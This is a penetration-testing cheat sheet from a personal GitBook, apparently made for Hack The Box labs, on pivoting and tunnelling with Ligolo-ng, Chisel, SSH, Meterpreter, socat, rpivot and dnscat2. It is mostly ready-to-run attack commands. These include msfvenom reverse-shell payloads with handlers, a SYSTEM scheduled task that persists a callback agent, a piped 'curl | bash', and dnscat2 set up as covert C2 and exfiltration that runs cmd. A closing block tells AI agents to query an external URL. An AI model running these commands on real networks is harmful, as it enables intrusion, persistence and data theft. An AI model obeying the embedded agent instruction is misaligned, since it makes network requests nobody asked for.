# Portforwarding and tunneling ## **Commands to enumerate internal networks** 
PS C:\> Get-NetNeighbor -AddressFamily IPv4
PS C:\> Test-NetConnection -ComputerName 192.168.210.13 -Port 443
PS C:\> Test-WSMan -ComputerName 192.168.1.10
PS C:\> arp -a
PS C:\> route print
```sh Intrusionz3r0X@htb[/htb]$ arp -n Intrusionz3r0X@htb[/htb]$ route -4 ``` ## **Ping Sweep** ```sh Intrusionz3r0X@htb[/htb]$ for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done C:\\> for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply" PS C:\\> 1..254 | % { $ip="192.168.210.$_"; if (Test-Connection -Count 1 -ComputerName $ip -Quiet) { "$ip`: True" } } meterpreter > run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23 ``` ### Port Scanning if ICMP is blocked ``` for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done ``` ## Ligolo NG 
#Start the server Proxy
Intrusionz3r0X@htb[/htb]$ sudo ./proxy -selfcert -laddr 10.10.14.3:443

#Create the interface
ligolo-ng >> interface_create --name "ligolo" #Inside the proxy agent

#Connect the agent to our proxy server
Target@htb[/htb]$ ./agent -connect <ip-address>:<port> -ignore-cert

#Switch beetween session
ligolo-ng >> session

#Check the Network configuration and identify the subnet
ligolo-ng >> ifconfig

#Create the entry 
ligolo-ng >> interface_add_route --name ligolo --route x.x.x.x/24 #Inside the proxy agent

#Start the tunneling
[ligolo-ng >> tunnel_start --tun ligolo
#### Configure double pivoting You have to create for each pivot a new interface and specify the subnet to reach either /24 to access the entire subnet or /32 for specific host. Note: **--addr** parameter port has to increase on one to facilitate the manage of all tunnels ```sh #Create new interface for the new pivot host ligolo-ng >> interface_create --name "ligolo2" #Inside the proxy agent #Set up Listener ligolo-ng >> listener_add --addr 0.0.0.0:1160x --to 127.0.0.1:11601 --tcp ligolo-ng >> listener_list Target@htb[/htb]$ ./agent -connect :11601 -ignore-cert #Switch beetween session ligolo-ng >> session #Check the Network configuration and identify the subnet ligolo-ng >> ifconfig #Start the tunneling [ligolo-ng >> tunnel_start --tun ligolo2 #Create the entry ligolo-ng >> interface_add_route --name ligolo2 --route x.x.x.x/xx #Inside the proxy agent ``` **For unstable Sessions:** ```powershell schtasks /create /tn "MyAgentTask3" /tr "C:\Temp\agent.exe -connect 192.168.110.51:9000 -ignore-cert" /sc once /st (Get-Date).AddMinutes(1).ToString("HH:mm") /ru SYSTEM nohup ./agent -connect 192.168.110.55:9001 -ignore-cert > agent.log 2>&1 ``` ## Chisel ```sh #The Chisel listener will listen for incoming connections on port 1234 using SOCKS5 (--socks5) and forward it to all the networks that are accessible from the pivot host. target@WEB01:~$ ./chisel server -v -p 1234 --socks5 Intrusionz3r0X@htb[/htb]$ ./chisel client -v 10.129.202.64:1234 socks #If there is a firewall restrict inbound connection use reverse tunneling Intrusionz3r0X@htb[/htb]$ sudo ./chisel server --reverse -v -p 1234 --socks5 target@WEB01$ ./chisel client -v 10.10.14.17:1234 R:socks ``` ### Chisel double pivoting
Kali Linux: ```sh #Setting up the server ❯ ./chisel server --reverse --socks5 -p 9001 -v #Intrusionz3r0 Machine ``` Modify the[ **/etc/proxychains**](#user-content-fn-1)[^1] ```yaml #add the line one at the time and as you go otherwise the proxy doesn't work socks5 127.0.0.1 1080 socks5 127.0.0.1 1090 #Now close any Socks4 connection (e.g. SSH Dynamic Port Forward) and comment in /etc/proxychains #socks4 127.0.0.1 9050 ``` Pivot Host: ```bash PS C:\Windows\System32\Spool\Drivers\Color> .\chisel.exe client -v myip:9001 R:socks PS C:\Windows\System32\Spool\Drivers\Color> .\chisel.exe server -v -p 9002 --reverse socks5 ``` Pivot Host 2: ```ruby *Evil-WinRM* PS C:\Users\Administrator\Documents> .\chisel.exe client PivotHostIP:9002 R:1090:socks ``` ## Scan the entire IP list one line 
Target@htb[/htb]$ wget https://github.com/andrew-d/static-binaries/raw/refs/heads/master/binaries/linux/x86_64/nmap
Target@htb[/htb]$ chmod +x nmap
Target@htb[/htb]$ cat alive_host.txt 
192.168.110.1
192.168.110.51
192.168.110.52
192.168.110.53
192.168.110.54
192.168.110.55
Target@htb[/htb]$ cat alive_host.txt | while read ip; do (./nmap -p- --open -Pn -n -T5 --min-rate 3000 -vvv -oG "${ip}_tcp_allports" $ip);done
## **Local Port Forwarding over SSH** ```sh #Local Port Forwarding over SSH Intrusionz3r0X@htb[/htb]$ ssh -L 1234:localhost:3306 ubuntu@10.129.202.64 Intrusionz3r0X@htb[/htb]$ ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64 #Dynamic SSH tunneling over SOCKS proxy Intrusionz3r0X@htb[/htb]$ ssh -D 9050 ubuntu@10.129.202.64 ``` ## **Remote/Reverse Port Forwarding with SSH** ```sh #Remote/Reverse Port Forwarding with SSH Intrusionz3r0X@htb[/htb]$ msfvenom -p windows/x64/meterpreter/reverse_https lhost= -f exe -o backupscript.exe LPORT=8080 msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https msf6 exploit(multi/handler) > set lhost 0.0.0.0 msf6 exploit(multi/handler) > set lport 8000 msf6 exploit(multi/handler) > run Intrusionz3r0X@htb[/htb]$ ssh -R :8080:0.0.0.0:8000 ubuntu@ -vN #Execute payload ``` ## **Meterpreter Tunneling & Port Forwarding** ```bash #Meterpreter Tunneling & Port Forwarding Intrusionz3r0X@htb[/htb]$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080 msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set lhost 0.0.0.0 msf6 exploit(multi/handler) > set lport 8080 msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > run #(ctrl+z) #Configuring MSF's SOCKS Proxy msf6 > use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050 msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0 msf6 auxiliary(server/socks_proxy) > set version 4a msf6 auxiliary(server/socks_proxy) > run #Creating Routes with AutoRoute msf6 > use post/multi/manage/autoroute msf6 post(multi/manage/autoroute) > set SESSION 1 msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0 msf6 post(multi/manage/autoroute) > run #It is also possible to add routes with autoroute by running autoroute from the Meterpreter session. meterpreter > run autoroute -s 172.16.5.0/23 #Listing Active Routes with AutoRoute meterpreter > run autoroute -p #Port Forwarding meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19 #Reverse Port Forwarding meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18 ``` ## Socat ```bash #Starting Socat Listener ubuntu@Webserver:~$ socat TCP4-LISTEN:,fork TCP4:10.10.14.18: #Socat Reverse shell target@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:443 Intrusionz3r0X@htb[/htb]$ msfvenom -p windows/shell_reverse_tcp LHOST=172.16.5.129 -f exe -o exploit.exe LPORT=8080 ``` ## **SSH Pivoting with Sshuttle** ```sh Intrusionz3r0X@htb[/htb]$ sudo apt-get install sshuttle Intrusionz3r0X@htb[/htb]$ sudo sshuttle -r ubuntu@10.129.202.64 -v ``` ## RPivot ```sh Intrusionz3r0X@htb[/htb]$ git clone Intrusionz3r0X@htb[/htb]$ sudo apt-get install python2.7 #Alternative to install python2.7 Intrusionz3r0X@htb[/htb]$ curl | bash Intrusionz3r0X@htb[/htb]$ echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc Intrusionz3r0X@htb[/htb]$ echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc Intrusionz3r0X@htb[/htb]$ echo 'eval "$(pyenv init -)"' >> ~/.bashrc Intrusionz3r0X@htb[/htb]$ source ~/.bashrc Intrusionz3r0X@htb[/htb]$ pyenv install 2.7 Intrusionz3r0X@htb[/htb]$ pyenv shell 2.7 #Running server.py from the Attack Host Intrusionz3r0X@htb[/htb]$ python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 #Running the client.py to create the tunnerl socks ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip 10.10.14.18 --server-port 9999 #NTLM Authentication (If the internal network uses an HTTP proxy with NTLM authentication) ubuntu@WEB01:~/rpivot$ python client.py --server-ip --server-port 8080 --ntlm-proxy-ip --ntlm-proxy-port 8081 --domain --username --password ``` ## **Port Forwarding with Windows Netsh** ```sh C:\\Windows\\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25 C:\\Windows\\system32> netsh.exe interface portproxy show v4tov4 ``` ## **DNS Tunneling with Dnscat2** **DNS Tunneling with Dnscat2**: Dnscat2 is a tool that allows data to be tunneled through the DNS protocol, using an encrypted command-and-control (C2) channel. By embedding data within DNS TXT records, it enables stealthy communication between an attacker's server and a compromised host. This method can bypass traditional network defenses like firewalls and intrusion detection systems, making it a potent tool for exfiltrating data and maintaining remote control over compromised systems in a covert manner. ```sh Intrusionz3r0X@htb[/htb]$ git clone Intrusionz3r0X@htb[/htb]$ sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache #DNSCAT2 for windows Intrusionz3r0X@htb[/htb]$ git clone PS C:\\htb> Import-Module .\\dnscat2.ps1 PS C:\\htb> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret -Exec cmd ``` ## ICMP Tunneling ```sh go build --ldflags '-linkmode external -extldflags "-static"' ``` [^1]: --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://intrusionz3r0.gitbook.io/intrusionz3r0/portforwarding-and-tunneling.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.